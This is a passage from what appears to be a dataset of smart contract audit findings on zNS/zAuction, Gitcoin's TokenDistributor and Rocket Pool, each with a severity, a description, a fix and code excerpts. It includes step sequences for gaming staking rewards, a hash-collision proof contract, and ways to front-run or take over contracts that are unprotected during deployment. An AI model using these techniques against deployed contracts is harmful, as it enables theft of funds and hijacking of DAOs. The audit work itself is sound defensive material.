require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\n\\n```\\n function fulfillDomainBid(\\n uint256 parentId,\\n uint256 bidAmount,\\n uint256 royaltyAmount,\\n string memory bidIPFSHash,\\n string memory name,\\n string memory metadata,\\n bytes memory signature,\\n bool lockOnCreation,\\n address recipient\\n) external {\\n bytes32 recoveredBidHash = createBid(parentId, bidAmount, bidIPFSHash, name);\\n address recoveredBidder = recover(recoveredBidHash, signature);\\n require(recipient == recoveredBidder, \"ZNS: bid info doesnt match/exist\");\\n bytes32 hashOfSig = keccak256(abi.encode(signature));\\n require(approvedBids[hashOfSig] == true, \"ZNS: has been fullfilled\");\\n infinity.safeTransferFrom(recoveredBidder, controller, bidAmount);\\n uint256 id = registrar.registerDomain(parentId, name, controller, recoveredBidder);\\n registrar.setDomainMetadataUri(id, metadata);\\n registrar.setDomainRoyaltyAmount(id, royaltyAmount);\\n registrar.transferFrom(controller, recoveredBidder, id);\\n if (lockOnCreation) {\\n registrar.lockDomainMetadataForOwner(id);\\n }\\n approvedBids[hashOfSig] = false;\\n emit DomainBidFulfilled(\\n metadata,\\n name,\\n recoveredBidder,\\n id,\\n parentId\\n );\\n}\\n```\\nчConsider adding an expiration field to the message signed by the bidder both for `zAuction` and `zNS`. Consider adding auction control, creating an `auctionId`, and have users bid on specific auctions. By adding this id to the signed message, all other bids are invalidated automatically and users would have to place new bids for a new auction. Optionally allow users to cancel bids explicitly.\\nчч```\\nfunction acceptBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\n -zNS - Insufficient protection against replay attacksчhighчThere is no dedicated data structure to prevent replay attacks on `StakingController`. `approvedBids` mapping offers only partial mitigation, due to the fact that after a domain bid is fulfilled, the only mechanism in place to prevent a replay attack is the `Registrar` contract that might be replaced in the case where `StakingController` is being re-deployed with a different `Registrar` instance. Additionally, the digital signature used for domain bids does not identify the buyer request uniquely enough. The bidder's signature could be replayed in future similar contracts that are deployed with a different registrar or in a different network.\\n```\\nfunction createBid(\\n uint256 parentId,\\n uint256 bidAmount,\\n string memory bidIPFSHash,\\n string memory name\\n) public pure returns(bytes32) {\\n return keccak256(abi.encode(parentId, bidAmount, bidIPFSHash, name));\\n}\\n```\\nчConsider adding a dedicated mapping to store the a unique identifier of a bid, as well as adding `address(this)`, `block.chainId`, `registrar` and `nonce` to the message that is being signed by the bidder.чч```\\nfunction createBid(\\n uint256 parentId,\\n uint256 bidAmount,\\n string memory bidIPFSHash,\\n string memory name\\n) public pure returns(bytes32) {\\n return keccak256(abi.encode(parentId, bidAmount, bidIPFSHash, name));\\n}\\n```\\n -zNS - domain name collisionsчhighчDomain registration accepts an empty (zero-length) name. This may allow a malicious entity to register two different NFT's for the same visually indinstinguishable text representation of a domain. Similar to this the domain name is mapped to an NFT via a subgraph that connects parent names to the new subdomain using a domain separation character (dot/slash/…). Someone might be able to register `a.b` to `cats.cool` which might resolve to the same domain as if someone registers `cats.cool.a` and then `cats.cool.a.b`.\\n`0/cats/` = `0xfe`\\n`0/cats/ refund NETH]\\n[burn NETH for ETH]\\n// rest of code wait 14 days\\n[withdraw stake OR start again creating Minipools, claiming rewards while the Minipools are dissolved right after, freeing the ETH]\\n```\\n\\nBy staking just before claiming, the node effectively can earn rewards for 2 reward periods by only staking RPL for the duration of one period (claim the previous period, leave it in for 14 days, claim another period, withdraw).\\nThe stake can be withdrawn at the earliest 14 days after staking. However, it can be added back at any time, and the stake addition takes effect immediately. This allows for optimizing the staking reward as follows (assuming we front-run other claimers to maximize profits and perform all transactions in one block):\\n```\\n[stake max effective amount for the number of minipools]\\n[claim() to claim the previous period even though we did not provide any stake for the duration]\\n[optionally dissolve Minipools unlocking ETH]\\n-- stake is locked for at least 14 days --\\n-- 14 days forward - new reward period started --\\n[claim() the period]\\n[withdraw() (leaving min pool stake OR everything if we dissolve all the Minipool)]\\n[lend RPL to other platforms and earn interest]\\n-- 14 days forward -new reward period started --\\n[get RPL back from another platform]\\n[stake & create minipools to inflate effective stake]\\n[claim()]\\n[optionally dissolve Minipools to unlock node ETH]\\n-- stake is locked for at least 14 days --\\n-- 14 days forward - new reward period started --\\n[claim() the period]\\n[withdraw() (leaving min pool stake OR everything if we dissolve all the Minipools)]\\n[lend RPL to other platforms and earn interest]\\n// rest of code\\n```\\n\\nNote that `withdraw()` can be called right at the time the new reward period starts:\\n```\\nrequire(block.number.sub(getNodeRPLStakedBlock(msg.sender)) >= rocketDAOProtocolSettingsRewards.getRewardsClaimIntervalBlocks(), \"The withdrawal cooldown period has not passed\");\\n// Get & check node's current RPL stake\\n```\\n\\nA node may choose to register and stake some RPL to collect rewards but never actually provide registered node duties, e.g., operating a Minipool.\\nNode shares for a passed reward epoch are unpredictable as nodes may change their stake (adding) after/before users claim their rewards.\\nA node can maximize its rewards by adding stake just before claiming it\\nA node can stake to claim rewards, wait 14 days, withdraw, lend on a platform and return the stake in time to claim the next period.чReview the incentive model for the RPL rewards. Consider adjusting it so that nodes that provide a service get a better share of the rewards. Consider accruing rewards for the duration the stake was provided instead of taking a snapshot whenever the node calls `claim()`. Require stake to be locked for > 14 days instead of >=14 days (withdraw()) or have users skip the first reward period after staking.чч```\\n-- reward period ends -- front-run other claimers to maximize profits\\n[create x minipools]\\n[stake to max effective RPL for amount of minipools; locked for 14 days]\\n[claim rewards for inflated effective RPL stake]\\n[dissolve(), close() minipools -> refund NETH]\\n[burn NETH for ETH]\\n// rest of code wait 14 days\\n[withdraw stake OR start again creating Minipools, claiming rewards while the Minipools are dissolved right after, freeing the ETH]\\n```\\n -Prefer using abi.encode in TokenDistributorчmediumчThe method `_hashLeaf` is called when a user claims their airdrop.\\n```\\n// can we repoduce leaf hash included in the claim?\\nrequire(\\_hashLeaf(user\\_id, user\\_amount, leaf), 'TokenDistributor: Leaf Hash Mismatch.');\\n```\\n\\nThis method receives the `user_id` and the `user_amount` as arguments.\\n```\\n/\\*\\*\\n\\* @notice hash user\\_id + claim amount together & compare results to leaf hash \\n\\* @return boolean true on match\\n\\*/\\nfunction \\_hashLeaf(uint32 user\\_id, uint256 user\\_amount, bytes32 leaf) private returns (bool) {\\n```\\n\\nThese arguments are abi encoded and hashed together to produce a unique hash.\\n```\\nbytes32 leaf\\_hash = keccak256(abi.encodePacked(keccak256(abi.encodePacked(user\\_id, user\\_amount))));\\n```\\n\\nThis hash is checked against the third argument for equality.\\n```\\nreturn leaf == leaf\\_hash;\\n```\\n\\nIf the hash matches the third argument, it returns true and considers the provided `user_id` and `user_amount` are correct.\\nHowever, packing differently sized arguments may produce collisions.\\nThe Solidity documentation states that packing dynamic types will produce collisions, but this is also the case if packing `uint32` and `uint256`.\\nBelow there's an example showing that packing `uint32` and `uint256` in both orders can produce collisions with carefully picked values.\\n```\\nlibrary Encode {\\n function encode32Plus256(uint32 \\_a, uint256 \\_b) public pure returns (bytes memory) {\\n return abi.encodePacked(\\_a, \\_b);\\n }\\n \\n function encode256Plus32(uint256 \\_a, uint32 \\_b) public pure returns (bytes memory) {\\n return abi.encodePacked(\\_a, \\_b);\\n }\\n}\\n\\ncontract Hash {\\n function checkEqual() public pure returns (bytes32, bytes32) {\\n // Pack 1\\n uint32 a1 = 0x12345678;\\n uint256 b1 = 0x99999999999999999999999999999999999999999999999999999999FFFFFFFF;\\n \\n // Pack 2\\n uint256 a2 = 0x1234567899999999999999999999999999999999999999999999999999999999;\\n uint32 b2 = 0xFFFFFFFF;\\n \\n // Encode these 2 different values\\n bytes memory packed1 = Encode.encode32Plus256(a1, b1);\\n bytes memory packed2 = Encode.encode256Plus32(a2, b2);\\n \\n // Check if the packed encodings match\\n require(keccak256(packed1) == keccak256(packed2), \"Hash of representation should match\");\\n \\n // The hashes are the same\\n // 0x9e46e582607c5c6e05587dacf66d311c4ced0819378a41d4b4c5adf99d72408e\\n return (\\n keccak256(packed1),\\n keccak256(packed2)\\n );\\n }\\n}\\n```\\n\\nChanging `abi.encodePacked` to `abi.encode` in the library will make the transaction fail with error message `Hash of representation should match`.чResolution\\nFixed in gitcoinco/governance#7\\nUnless there's a specific use case to use `abi.encodePacked`, you should always use `abi.encode`. You might need a few more bytes in the transaction data, but it prevents collisions. Similar fix can be achieved by using `unit256` for both values to be packed to prevent any possible collisions.чч```\\n// can we repoduce leaf hash included in the claim?\\nrequire(\\_hashLeaf(user\\_id, user\\_amount, leaf), 'TokenDistributor: Leaf Hash Mismatch.');\\n```\\n -Simplify claim tokens for a gas discount and less codeчlowчThe method `claimTokens` in `TokenDistributor` needs to do a few checks before it can distribute the tokens.\\nA few of these checks can be simplified and optimized.\\nThe method `hashMatch` can be removed because it's only used once and the contents can be moved directly into the parent method.\\n```\\n// can we reproduce the same hash from the raw claim metadata?\\nrequire(hashMatch(user\\_id, user\\_address, user\\_amount, delegate\\_address, leaf, eth\\_signed\\_message\\_hash\\_hex), 'TokenDistributor: Hash Mismatch.');\\n```\\n\\nBecause this method also uses a few other internal calls, they also need to be moved into the parent method.\\n```\\nreturn getDigest(claim) == eth\\_signed\\_message\\_hash\\_hex;\\n```\\n\\n```\\nhashClaim(claim)\\n```\\n\\nMoving the code directly in the parent method and removing them will improve gas costs for users.\\nThe structure `Claim` can also be removed because it's not used anywhere else in the code.чConsider simplifying `claimTokens` and remove unused methods.чч```\\n// can we reproduce the same hash from the raw claim metadata?\\nrequire(hashMatch(user\\_id, user\\_address, user\\_amount, delegate\\_address, leaf, eth\\_signed\\_message\\_hash\\_hex), 'TokenDistributor: Hash Mismatch.');\\n```\\n -Rename method _hashLeaf to something that represents the validity of the leafчlowчThe method `_hashLeaf` accepts 3 arguments.\\n```\\nfunction \\_hashLeaf(uint32 user\\_id, uint256 user\\_amount, bytes32 leaf) private returns (bool) {\\n```\\n\\nThe arguments `user_id` and `user_amount` are used to create a keccak256 hash.\\n```\\nbytes32 leaf\\_hash = keccak256(abi.encodePacked(keccak256(abi.encodePacked(user\\_id, user\\_amount))));\\n```\\n\\nThis hash is then checked if it matches the third argument.\\n```\\nreturn leaf == leaf\\_hash;\\n```\\n\\nThe result of the equality is returned by the method.\\nThe name of the method is confusing because it should say that it returns true if the leaf is considered valid.чResolution\\nClosed because the method was removed in gitcoinco/governance#4\\nConsider renaming the method to something like `isValidLeafHash`.чч```\\nfunction \\_hashLeaf(uint32 user\\_id, uint256 user\\_amount, bytes32 leaf) private returns (bool) {\\n```\\n -Method returns bool but result is never used in TokenDistributor.claimTokensчlowчThe method `_delegateTokens` is called when a user claims their tokens to automatically delegate the claimed tokens to their own address or to a different one.\\n```\\n\\_delegateTokens(user\\_address, delegate\\_address);\\n```\\n\\nThe method accepts the addresses of the delegator and the delegate and returns a boolean.\\n```\\n/\\*\\*\\n\\* @notice execute call on token contract to delegate tokens \\n\\* @return boolean true on success \\n\\*/\\nfunction \\_delegateTokens(address delegator, address delegatee) private returns (bool) {\\n GTCErc20 GTCToken = GTCErc20(token);\\n GTCToken.delegateOnDist(delegator, delegatee);\\n return true; \\n} \\n```\\n\\nBut this boolean is never used.чRemove the returned boolean because it's always returned as `true` anyway and the transaction will be a bit cheaper.чч```\\n\\_delegateTokens(user\\_address, delegate\\_address);\\n```\\n -Improve efficiency by using immutable in TreasuryVesterчlowчThe `TreasuryVester` contract when deployed has a few fixed storage variables.\\n```\\ngtc = gtc\\_;\\n```\\n\\n```\\nvestingAmount = vestingAmount\\_;\\nvestingBegin = vestingBegin\\_;\\nvestingCliff = vestingCliff\\_;\\nvestingEnd = vestingEnd\\_;\\n```\\n\\nThese storage variables are defined in the contract.\\n```\\naddress public gtc;\\n```\\n\\n```\\nuint public vestingAmount;\\nuint public vestingBegin;\\nuint public vestingCliff;\\nuint public vestingEnd;\\n```\\n\\nBut they are never changed.чResolution\\nFixed in gitcoinco/governance#5\\nConsider setting storage variables as `immutable` type for a considerable gas improvement.чч```\\ngtc = gtc\\_;\\n```\\n -RocketDaoNodeTrusted - DAO takeover during deployment/bootstrappingчhighчThe initial deployer of the `RocketStorage` contract is set as the Guardian/Bootstrapping role. This guardian can bootstrap the TrustedNode and Protocol DAO, add members, upgrade components, change settings.\\nRight after deploying the DAO contract the member count is zero. The Guardian can now begin calling any of the bootstrapping functions to add members, change settings, upgrade components, interact with the treasury, etc. The bootstrapping configuration by the Guardian is unlikely to all happen within one transaction which might allow other parties to interact with the system while it is being set up.\\n`RocketDaoNodeTrusted` also implements a recovery mode that allows any registered node to invite themselves directly into the DAO without requiring approval from the Guardian or potential other DAO members as long as the total member count is below `daoMemberMinCount` (3). The Guardian itself is not counted as a DAO member as it is a supervisory role.\\n```\\n/\\*\\*\\*\\* Recovery \\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*/\\n \\n// In an explicable black swan scenario where the DAO loses more than the min membership required (3), this method can be used by a regular node operator to join the DAO\\n// Must have their ID, email, current RPL bond amount available and must be called by their current registered node account\\nfunction memberJoinRequired(string memory \\_id, string memory \\_email) override public onlyLowMemberMode onlyRegisteredNode(msg.sender) onlyLatestContract(\"rocketDAONodeTrusted\", address(this)) {\\n // Ok good to go, lets add them\\n (bool successPropose, bytes memory responsePropose) = getContractAddress('rocketDAONodeTrustedProposals').call(abi.encodeWithSignature(\"proposalInvite(string,string,address)\", \\_id, \\_email, msg.sender));\\n // Was there an error?\\n require(successPropose, getRevertMsg(responsePropose));\\n // Get the to automatically join as a member (by a regular proposal, they would have to manually accept, but this is no ordinary situation)\\n (bool successJoin, bytes memory responseJoin) = getContractAddress(\"rocketDAONodeTrustedActions\").call(abi.encodeWithSignature(\"actionJoinRequired(address)\", msg.sender));\\n // Was there an error?\\n require(successJoin, getRevertMsg(responseJoin));\\n}\\n```\\n\\nThis opens up a window during the bootstrapping phase where any Ethereum Address might be able to register as a node (RocketNodeManager.registerNode) if node registration is enabled (default=true) rushing into `RocketDAONodeTrusted.memberJoinRequired` adding themselves (up to 3 nodes) as trusted nodes to the DAO. The new DAO members can now take over the DAO by issuing proposals, waiting 2 blocks to vote/execute them (upgrade, change settings while Guardian is changing settings, etc.). The Guardian role can kick the new DAO members, however, they can invite themselves back into the DAO.\\n```\\nsetSettingBool(\"node.registration.enabled\", true); \\n```\\nчDisable the DAO recovery mode during bootstrapping. Disable node registration by default and require the guardian to enable it. Ensure that `bootstrapDisable` (in both DAO contracts) performs sanity checks as to whether the DAO bootstrapping finished and permissions can effectively be revoked without putting the DAO at risk or in an irrecoverable state (enough members bootstrapped, vital configurations like registration and other settings are configured, …).чч```\\n/\\*\\*\\*\\* Recovery \\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*/\\n \\n// In an explicable black swan scenario where the DAO loses more than the min membership required (3), this method can be used by a regular node operator to join the DAO\\n// Must have their ID, email, current RPL bond amount available and must be called by their current registered node account\\nfunction memberJoinRequired(string memory \\_id, string memory \\_email) override public onlyLowMemberMode onlyRegisteredNode(msg.sender) onlyLatestContract(\"rocketDAONodeTrusted\", address(this)) {\\n // Ok good to go, lets add them\\n (bool successPropose, bytes memory responsePropose) = getContractAddress('rocketDAONodeTrustedProposals').call(abi.encodeWithSignature(\"proposalInvite(string,string,address)\", \\_id, \\_email, msg.sender));\\n // Was there an error?\\n require(successPropose, getRevertMsg(responsePropose));\\n // Get the to automatically join as a member (by a regular proposal, they would have to manually accept, but this is no ordinary situation)\\n (bool successJoin, bytes memory responseJoin) = getContractAddress(\"rocketDAONodeTrustedActions\").call(abi.encodeWithSignature(\"actionJoinRequired(address)\", msg.sender));\\n // Was there an error?\\n require(successJoin, getRevertMsg(responseJoin));\\n}\\n```\\n -RocketDaoNodeTrustedActions - Incomplete implementation of member challenge processчhighчAny registered (even untrusted) node can challenge a trusted DAO node to respond. The challenge is initiated by calling `actionChallengeMake`. Trusted nodes can challenge for free, other nodes have to provide `members.challenge.cost` as a tribute to the Ethereum gods. The challenged node must call `actionChallengeDecide` before `challengeStartBlock + members.challenge.window` blocks are over (default approx 7 days). However, the Golang codebase does not actively monitor for the `ActionChallengeMade` event, nor does the node - regularly - check if it is being challenged. Means to respond to the challenge (calling `actionChallengeDecide` to stop the challenge) are not implemented.\\nNodes do not seem to monitor `ActionChallengeMade` events so that they could react to challenges\\nNodes do not implement `actionChallengeDecide` and, therefore, cannot successfully stop a challenge\\nFunds/Tribute sent along with the challenge will be locked forever in the `RocketDAONodeTrustedActions` contract. There's no means to recover the funds.\\nIt is questionable whether the incentives are aligned well enough for anyone to challenge stale nodes. The default of `1 eth` compared to the risk of the “malicious” or “stale” node exiting themselves is quite high. The challenger is not incentivized to challenge someone other than for taking over the DAO. If the tribute is too low, this might incentivize users to grief trusted nodes and force them to close a challenge.\\nRequiring that the challenge initiator is a different registered node than the challenge finalized is a weak protection since the system is open to anyone to register as a node (even without depositing any funds.)\\nblock time is subject to fluctuations. With the default of `43204` blocks, the challenge might expire at `5 days` (10 seconds block time), `6.5 days` (13 seconds Ethereum target median block time), `7 days` (14 seconds), or more with historic block times going up to `20 seconds` for shorter periods.\\nA minority of trusted nodes may use this functionality to boot other trusted node members off the DAO issuing challenges once a day until the DAO member number is low enough to allow them to reach quorum for their own proposals or until the member threshold allows them to add new nodes without having to go through the proposal process at all.\\n```\\nsetSettingUint('members.challenge.cooldown', 6172); // How long a member must wait before performing another challenge, approx. 1 day worth of blocks\\nsetSettingUint('members.challenge.window', 43204); // How long a member has to respond to a challenge. 7 days worth of blocks\\nsetSettingUint('members.challenge.cost', 1 ether); // How much it costs a non-member to challenge a members node. It's free for current members to challenge other members.\\n```\\n\\n```\\n// In the event that the majority/all of members go offline permanently and no more proposals could be passed, a current member or a regular node can 'challenge' a DAO members node to respond\\n// If it does not respond in the given window, it can be removed as a member. The one who removes the member after the challenge isn't met, must be another node other than the proposer to provide some oversight\\n// This should only be used in an emergency situation to recover the DAO. Members that need removing when consensus is still viable, should be done via the 'kick' method.\\n```\\nчImplement the challenge-response process before enabling users to challenge other nodes. Implement means to detect misuse of this feature for griefing e.g. when one trusted node member forces another trusted node to defeat challenges over and over again (technical controls, monitoring).чч```\\nsetSettingUint('members.challenge.cooldown', 6172); // How long a member must wait before performing another challenge, approx. 1 day worth of blocks\\nsetSettingUint('members.challenge.window', 43204); // How long a member has to respond to a challenge. 7 days worth of blocks\\nsetSettingUint('members.challenge.cost', 1 ether); // How much it costs a non-member to challenge a members node. It's free for current members to challenge other members.\\n```\\n -RocketDAOProtocolSettings/RocketDAONodeTrustedSettings - anyone can set/overwrite settings until contract is declared “deployed” AcknowledgedчhighчThe `onlyDAOProtocolProposal` modifier guards all state-changing methods in this contract. However, analog to https://github.com/ConsenSys/rocketpool-audit-2021-03/issues/7, the access control is disabled until the variable `settingsNameSpace.deployed` is set. If this contract is not deployed and configured in one transaction, anyone can update the contract while left unprotected on the blockchain.\\nSee issue 6.5 for a similar issue.\\n```\\nmodifier onlyDAOProtocolProposal() {\\n // If this contract has been initialised, only allow access from the proposals contract\\n if(getBool(keccak256(abi.encodePacked(settingNameSpace, \"deployed\")))) require(getContractAddress('rocketDAOProtocolProposals') == msg.sender, \"Only DAO Protocol Proposals contract can update a setting\");\\n \\_;\\n}\\n```\\n\\n```\\nmodifier onlyDAONodeTrustedProposal() {\\n // If this contract has been initialised, only allow access from the proposals contract\\n if(getBool(keccak256(abi.encodePacked(settingNameSpace, \"deployed\")))) require(getContractAddress('rocketDAONodeTrustedProposals') == msg.sender, \"Only DAO Node Trusted Proposals contract can update a setting\");\\n \\_;\\n}\\n```\\n\\nThere are at least 9 more occurrences of this pattern.чRestrict access to the methods to a temporary trusted account (e.g. guardian) until the system bootstrapping phase ends by setting `deployed` to `true.`чч```\\nmodifier onlyDAOProtocolProposal() {\\n // If this contract has been initialised, only allow access from the proposals contract\\n if(getBool(keccak256(abi.encodePacked(settingNameSpace, \"deployed\")))) require(getContractAddress('rocketDAOProtocolProposals') == msg.sender, \"Only DAO Protocol Proposals contract can update a setting\");\\n \\_;\\n}\\n```\\n -RocketStorage - anyone can set/update values before the contract is initializedчhighчAccording to the deployment script, the contract is deployed, and settings are configured in multiple transactions. This also means that for a period of time, the contract is left unprotected on the blockchain. Anyone can delete/set any value in the centralized data store. An attacker might monitor the mempool for new deployments of the `RocketStorage` contract and front-run calls to `contract.storage.initialised` setting arbitrary values in the system.\\n```\\nmodifier onlyLatestRocketNetworkContract() {\\n // The owner and other contracts are only allowed to set the storage upon deployment to register the initial contracts/settings, afterwards their direct access is disabled\\n if (boolStorage[keccak256(abi.encodePacked(\"contract.storage.initialised\"))] == true) {\\n // Make sure the access is permitted to only contracts in our Dapp\\n require(boolStorage[keccak256(abi.encodePacked(\"contract.exists\", msg.sender))], \"Invalid or outdated network contract\");\\n }\\n \\_;\\n}\\n```\\nчRestrict access to the methods to a temporary trusted account (e.g. guardian) until the system bootstrapping phase ends by setting `initialised` to `true.`чч```\\nmodifier onlyLatestRocketNetworkContract() {\\n // The owner and other contracts are only allowed to set the storage upon deployment to register the initial contracts/settings, afterwards their direct access is disabled\\n if (boolStorage[keccak256(abi.encodePacked(\"contract.storage.initialised\"))] == true) {\\n // Make sure the access is permitted to only contracts in our Dapp\\n require(boolStorage[keccak256(abi.encodePacked(\"contract.exists\", msg.sender))], \"Invalid or outdated network contract\");\\n }\\n \\_;\\n}\\n```\\n -RocketDAOProposals - Unpredictable behavior due to short vote delayчhighчA proposal can be voted and passed when it enters the `ACTIVE` state. Voting starts when the current `block.number` is greater than the `startBlock` configured in the proposal (up until the endBlock). The requirement for the `startBlock` is to be at least greater than `block.number` when the proposal is submitted.\\n```\\nrequire(\\_startBlock > block.number, \"Proposal start block must be in the future\");\\nrequire(\\_durationBlocks > 0, \"Proposal cannot have a duration of 0 blocks\");\\nrequire(\\_expiresBlocks > 0, \"Proposal cannot have a execution expiration of 0 blocks\");\\nrequire(\\_votesRequired > 0, \"Proposal cannot have a 0 votes required to be successful\");\\n```\\n\\nThe default vote delay configured in the system is `1` block.\\n```\\nsetSettingUint('proposal.vote.delay.blocks', 1); // How long before a proposal can be voted on after it is created. Approx. Next Block\\n```\\n\\nA vote is immediately passed when the required quorum is reached which allows it to be executed. This means that a group that is holding enough voting power can propose a change, wait for two blocks (block.number (of time of proposal creation) + configuredDelay (1) + 1 (for ACTIVE state), then vote and execute for the proposal to pass for it to take effect almost immediately after only 2 blocks (<30seconds).\\nSettings can be changed after 30 seconds which might be unpredictable for other DAO members and not give them enough time to oppose and leave the DAO.чThe underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change after two blocks. The only guarantee is that users can be sure the settings don't change for the next block if no proposal is active.\\nWe recommend giving the user advance notice of changes with a delay. For example, all upgrades should require two steps with a mandatory time window between them. The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period.чч```\\nrequire(\\_startBlock > block.number, \"Proposal start block must be in the future\");\\nrequire(\\_durationBlocks > 0, \"Proposal cannot have a duration of 0 blocks\");\\nrequire(\\_expiresBlocks > 0, \"Proposal cannot have a execution expiration of 0 blocks\");\\nrequire(\\_votesRequired > 0, \"Proposal cannot have a 0 votes required to be successful\");\\n```\\n -RocketNodeStaking - Node operators can reduce slashing impact by withdrawing excess staked RPLчhighчOracle nodes update the Minipools' balance and progress it to the withdrawable state when they observe the minipools stake to become withdrawable. If the observed stakingEndBalance is less than the user deposit for that pool, the node operator is punished for the difference.\\n```\\nrocketMinipoolManager.setMinipoolWithdrawalBalances(\\_minipoolAddress, \\_stakingEndBalance, nodeAmount);\\n// Apply node penalties by liquidating RPL stake\\nif (\\_stakingEndBalance < userDepositBalance) {\\n RocketNodeStakingInterface rocketNodeStaking = RocketNodeStakingInterface(getContractAddress(\"rocketNodeStaking\"));\\n rocketNodeStaking.slashRPL(minipool.getNodeAddress(), userDepositBalance - \\_stakingEndBalance);\\n}\\n```\\n\\nThe amount slashed is at max `userDepositBalance - stakingEndBalance`. The `userDepositBalance` is at least `16 ETH` (minipool.half/.full) and at max `32 ETH` (minipool.empty). The maximum amount to be slashed is therefore `32 ETH` (endBalance = 0, minipool.empty).\\nThe slashing amount is denoted in `ETH`. The `RPL` price (in ETH) is updated regularly by oracle nodes (see related issue https://github.com/ConsenSys/rocketpool-audit-2021-03/issues/32; note that the `RPL` token is potentially affected by a similar issue as one can stake `RPL`, wait for the cooldown period & wait for the price to change, and withdraw stake at higher `RPL` price/ETH). The `ETH` amount to be slashed is converted to `RPL`, and the corresponding `RPL` stake is slashed.\\n```\\nuint256 rplSlashAmount = calcBase.mul(\\_ethSlashAmount).div(rocketNetworkPrices.getRPLPrice());\\n// Cap slashed amount to node's RPL stake\\nuint256 rplStake = getNodeRPLStake(\\_nodeAddress);\\nif (rplSlashAmount > rplStake) { rplSlashAmount = rplStake; }\\n// Transfer slashed amount to auction contract\\nrocketVault.transferToken(\"rocketAuctionManager\", getContractAddress(\"rocketTokenRPL\"), rplSlashAmount);\\n// Update RPL stake amounts\\ndecreaseTotalRPLStake(rplSlashAmount);\\ndecreaseNodeRPLStake(\\_nodeAddress, rplSlashAmount);\\n```\\n\\nIf the node does not have a sufficient `RPL` stake to cover the losses, the slashing amount is capped at whatever amount of `RPL` the node has left staked.\\nThe minimum amount of `RPL` a node needs to have staked if it operates minipools is calculated as follows:\\n```\\n // Calculate minimum RPL stake\\n return rocketDAOProtocolSettingsMinipool.getHalfDepositUserAmount()\\n .mul(rocketDAOProtocolSettingsNode.getMinimumPerMinipoolStake())\\n .mul(rocketMinipoolManager.getNodeMinipoolCount(\\_nodeAddress))\\n .div(rocketNetworkPrices.getRPLPrice());\\n}\\n```\\n\\nWith the current configuration, this would resolve in a minimum stake of `16 ETH * 0.1 (10% collateralization) * 1 (nr_minipools) * RPL_Price` for a node operating 1 minipool. This means a node operator basically only needs to have 10% of `16 ETH` staked to operate one minipool.\\nAn operator can withdraw their stake at any time, but they have to wait at least 14 days after the last time they staked (cooldown period). They can, at max, withdraw all but the minimum stake required to run the pools (nr_of_minipools * 16 ETH * 10%). This also means that after the cooldown period, they can reduce their stake to 10% of the half deposit amount (16ETH), then perform a voluntary exit on ETH2 so that the minipool becomes `withdrawable`. If they end up with less than the `userDepositBalance` in staking rewards, they would only get slashed the `1.6 ETH` at max (10% of 16ETH half deposit amount for 1 minipool) even though they incurred a loss that may be up to 32 ETH (empty Minipool empty amount).\\nFurthermore, if a node operator runs multiple minipools, let's say 5, then they would have to provide at least `5*16ETH*0.1 = 8ETH` as a security guarantee in the form of staked RPL. If the node operator incurs a loss with one of their minipools, their 8 ETH RPL stake will likely be slashed in full. Their other - still operating - minipools are not backed by any RPL anymore, and they effectively cannot be slashed anymore. This means that a malicious node operator can create multiple minipools, stake the minimum amount of RPL, get slashed for one minipool, and still operate the others without having the minimum RPL needed to run the minipools staked (getNodeMinipoolLimit).\\nThe RPL stake is donated to the RocketAuctionManager, where they can attempt to buy back RPL potentially at a discount.\\nNote: Staking more RPL (e.g., to add another Minipool) resets the cooldown period for the total RPL staked (not only for the newly added)чIt is recommended to redesign the withdrawal process to prevent users from withdrawing their stake while slashable actions can still occur. A potential solution may be to add a locking period in the process. A node operator may schedule the withdrawal of funds, and after a certain time has passed, may withdraw them. This prevents the immediate withdrawal of funds that may need to be reduced while slashable events can still occur. E.g.:\\nA node operator requests to withdraw all but the minimum required stake to run their pools.\\nThe funds are scheduled for withdrawal and locked until a period of X days has passed.\\n(optional) In this period, a slashable event occurs. The funds for compensation are taken from the user's stake including the funds scheduled for withdrawal.\\nAfter the time has passed, the node operator may call a function to trigger the withdrawal and get paid out.чч```\\nrocketMinipoolManager.setMinipoolWithdrawalBalances(\\_minipoolAddress, \\_stakingEndBalance, nodeAmount);\\n// Apply node penalties by liquidating RPL stake\\nif (\\_stakingEndBalance < userDepositBalance) {\\n RocketNodeStakingInterface rocketNodeStaking = RocketNodeStakingInterface(getContractAddress(\"rocketNodeStaking\"));\\n rocketNodeStaking.slashRPL(minipool.getNodeAddress(), userDepositBalance - \\_stakingEndBalance);\\n}\\n```\\n -RocketTokenRPL - inaccurate inflation rate and potential for manipulation lowering the real APYчhighчRocketTokenRPL allows users to swap their fixed-rate tokens to the inflationary RocketTokenRPL ERC20 token via a `swapToken` function. The DAO defines the inflation rate of this token and is initially set to be 5% APY. This APY is configured as a daily inflation rate (APD) with the corresponding `1 day in blocks` inflation interval in the `rocketDAOProtocolSettingsInflation` contract. The DAO members control the inflation settings.\\nAnyone can call `inflationMintTokens` to inflate the token, which mints tokens to the contracts RocketVault. Tokens are minted for discreet intervals since the last time `inflationMintTokens` was called (recorded as inflationCalcBlock). The inflation is then calculated for the passed intervals without taking the current not yet completed interval. However, the `inflationCalcBlock` is set to the current `block.number`, effectively skipping some “time”/blocks of the APY calculation.\\nThe more often `inflationMintTokens` is called, the higher the APY likelihood dropping below the configured 5%. In the worst case, one could manipulate the APY down to 2.45% (assuming that the APD for a 5% APY was configured) by calling `inflationMintTokens` close to the end of every second 